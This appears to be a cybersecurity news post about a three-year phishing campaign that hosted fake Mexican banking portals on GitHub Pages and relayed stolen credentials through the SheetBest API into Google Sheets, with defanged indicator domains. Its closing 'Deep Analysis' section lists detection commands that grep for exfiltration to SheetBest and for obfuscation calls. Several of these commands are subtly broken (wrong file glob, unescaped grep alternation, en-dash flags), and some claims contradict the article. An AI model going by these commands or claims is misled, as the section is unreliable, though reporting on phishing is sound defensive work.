Listen to this Post
🌐 Introduction: When Trusted Platforms Become Attack Vectors
What happens when one of the world’s most trusted developer ecosystems turns into a stealth delivery system for cybercrime? That question is no longer theoretical. A long-running and highly sophisticated phishing campaign has been uncovered, leveraging GitHub Pages and modern serverless architecture to target at least 12 financial institutions in Mexico.
Instead of relying on traditional malicious servers, attackers have quietly built a distributed, modular ecosystem that blends into legitimate infrastructure. The result is a phishing operation that is harder to detect, harder to shut down, and far more scalable than conventional attacks.
🧠 Executive Summary: A 3-Year Silent Digital Infiltration
Researchers have revealed a phishing campaign active for nearly three years, operating with alarming precision. At its core, the attackers abuse GitHub Pages for hosting fake banking portals while using the SheetBest API as a real-time credential exfiltration bridge into Google Sheets.
Instead of deploying malware or centralized command-and-control servers, the attackers rely on serverless infrastructure. This design removes traditional “choke points” that security teams usually depend on for detection and takedown.
The campaign uses:
Over 100 malicious domains
Modular phishing templates
Real-time credential harvesting
Messaging app distribution vectors like WhatsApp, Telegram, and iMessage
🧩 The Architecture: A Fully Serverless Cybercrime Machine
The most striking feature of this campaign is its architecture. Traditional phishing operations depend on dedicated servers that can be traced and dismantled. This one does not.
Instead, attackers exploit:
GitHub Pages for hosting cloned banking portals
SheetBest API for data relay
Google Sheets as the final storage backend
Every component is legitimate. Every component is widely used. And together, they form a nearly invisible attack chain.
By avoiding infrastructure ownership, attackers eliminate one of the strongest tools defenders rely on: server takedown.
🏦 Targeting Financial Institutions in Mexico
The campaign is not random. It is highly targeted at at least 12 financial institutions in Mexico. Each phishing page is carefully customized to replicate real banking login flows, including:
Customer IDs
Password authentication
Card verification data
Victims are guided through realistic interfaces designed to mirror legitimate banking portals down to layout, branding, and flow logic.
The psychological precision is just as important as the technical sophistication.
🔐 Credential Theft Flow: Silent, Instant, Invisible
Once a victim enters sensitive data, nothing is submitted to a traditional server. Instead, malicious JavaScript running inside the browser intercepts the form submission.
The process:
Victim enters credentials
JavaScript stops normal form submission
Data is captured instantly in the browser
POST request is sent to SheetBest API
Data is stored in attacker-controlled Google Sheets
This method removes backend logging, removes server traces, and minimizes forensic evidence.
📡 Distribution Strategy: Messaging Apps as Infection Channels
Although the initial infection vector remains partially unknown, indicators strongly suggest heavy reliance on social engineering through messaging platforms.
Attack links are distributed via:
SMS messages
Chat applications
Social engineering lures
Because users tend to trust links shared in personal conversations, platforms like WhatsApp and Telegram become highly effective delivery systems.
🧬 Open Graph Manipulation: Making Phishing Look Legitimate
Attackers also exploit Open Graph metadata to enhance credibility. When links are shared, they generate rich previews displaying:
Bank logos
Brand names
Familiar visual elements
This makes malicious links appear authentic inside messaging apps like iMessage, increasing click-through rates significantly.
🕳️ Obfuscation and Routing Tricks: Hiding in Plain Sight
To evade detection, attackers use layered routing structures. Victims are first redirected through harmless-looking paths such as:
“/soporte” (support)
“/cancelacion” (cancellation)
Only later are they directed to credential harvesting endpoints.
Additionally:
Scripts are loaded externally with randomized paths
Payloads are not embedded directly in HTML
Code structure changes frequently
This makes static analysis extremely difficult for defenders.
🧨 Why This Campaign Is So Dangerous
This operation represents a shift in cybercrime strategy:
No servers to shut down
No malware to reverse engineer easily
No fixed infrastructure footprint
Continuous rotation of hosting repositories
It is phishing evolved into a cloud-native attack model.
📊 Indicators of Compromise (IoCs)
soporte-index25.github[.]io
soporte-index09.github[.]io
sntdr-soporte25.github[.]io
07-soporte.github[.]io
These indicators represent only a fraction of the distributed infrastructure.
🧠 What Undercode Say:
Serverless phishing reduces attacker operational risk significantly
GitHub Pages abuse is rising as trust in developer platforms increases
Financial phishing now mimics full application stacks, not static pages
Browser-side credential interception is becoming more common
Sheet-based exfiltration removes need for command-and-control servers
Modular phishing kits enable rapid replication across institutions
Messaging apps are now primary malware delivery vectors
Social engineering effectiveness is amplified by trust in chat platforms
Open Graph abuse turns links into visual deception tools
Attackers exploit legitimate APIs instead of building infrastructure
Detection systems struggle with serverless architectures
Threat attribution becomes harder without centralized endpoints
GitHub repository distribution creates redundancy layers
Rapid deployment reduces exposure window for defenders
Phishing is evolving into “software-as-a-service crime”
Credential theft now happens entirely in-browser
Real-time exfiltration increases attacker response speed
Data centralization in Sheets simplifies attacker workflows
Obfuscation techniques defeat signature-based detection
URL path masquerading mimics legitimate customer support flows
Multi-stage routing reduces forensic visibility
Distributed hosting prevents mass takedown success
Attack lifecycle is now automated end-to-end
No backend logs means minimal forensic trail
Attackers exploit trust in known tech brands
Browser-based attacks bypass many endpoint protections
Serverless architecture aligns with modern cloud trends
Security tools must shift toward behavioral detection
Traditional phishing indicators are becoming obsolete
Credential reuse risk increases financial exposure
Banking sector remains high-value cyber target
Social platforms act as attack amplifiers
API abuse is replacing custom malware infrastructure
Attack scalability is near-zero cost per deployment
Threat intelligence must track infrastructure-less attacks
Defensive response time is shrinking
Cross-platform messaging increases victim reach
Fake pages are indistinguishable without deep inspection
Automation allows continuous phishing kit evolution
Cybercrime is shifting toward cloud-native ecosystems
❌ Claim that GitHub is “inherently insecure” is misleading — the platform itself is not compromised; misuse is the issue
✅ Serverless phishing via legitimate APIs is a documented and growing cybercrime trend
✅ Messaging apps like WhatsApp and Telegram are widely used for phishing distribution campaigns
❌ Not all financial institutions in Mexico may be confirmed targets; attribution may vary by report scope
✅ Browser-based credential interception using JavaScript is a known phishing technique
❌ SheetBest API is not malicious by design; it is being abused as a neutral data relay tool
🔮 Prediction:
(+1) Future Evolution of Serverless Phishing
Attackers will likely expand this model into fully automated phishing-as-a-service platforms, combining AI-generated pages with real-time personalization. Expect tighter integration with cloud APIs and more abuse of legitimate developer ecosystems. 🌐📈
(-1) Defensive Challenges Intensify
Security teams will struggle more as infrastructure disappears entirely from traditional detection surfaces. Without servers to track, incident response will depend heavily on behavioral analytics and browser-level protection. ⚠️🛡️
🧪 Deep Analysis:
Inspect suspicious GitHub Pages activity patterns grep -R "form" ./phishing-repos/
Detect obfuscated JavaScript payloads
find . -name ".js" | xargs grep -i "atob|eval|unescape"
Analyze network POST exfiltration patterns
tcpdump -i eth0 port 443 -A | grep "sheetbest"
Monitor browser-based credential capture behavior
strace -f -e trace=network chrome
Identify fake routing paths in URLs
cat access.log | grep "/soporte|/cancelacion"
Extract Open Graph metadata abuse
curl -s https://target-site | grep "og:title|og:image"
Track API-based data exfiltration endpoints
grep -R "POST" ./scripts | grep "api"
Detect GitHub Pages mass deployment
gh repo list –visibility public | wc -l
Audit JavaScript injection points
eslint ./ –rule no-eval:warn
Monitor DNS patterns for phishing clusters
dig +short suspicious-domain.github.io
▶️ Related Video (74% Match):
🕵️📝Let’s dive deep and fact‑check.
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
References:
Reported By: cyberpress.org
Extra Source Hub (Possible Sources for article):
https://www.medium.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube
